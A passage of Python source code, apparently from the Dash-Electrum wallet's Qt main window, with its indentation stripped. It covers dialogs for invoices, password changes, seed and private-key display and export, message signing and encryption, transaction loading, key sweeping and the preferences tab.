grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
console.setObjectName("console_container")
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setObjectName("main_window_balance")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_dash.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Dash-Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Dash address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Dash address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_dash.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Dash-Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum_dash import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a dash URI
if str(data).startswith("dash:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(e))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Dash-Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_dash import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.get_transaction(txid)
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-dash-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Dash-Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum_dash.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
tabs.setObjectName("settings_tab")
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_dash.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', False)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 DASH = 1000 mDASH. 1 mDASH = 1000 uDASH. 1 uDASH = 100 duffs.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_dash import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 duffs might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
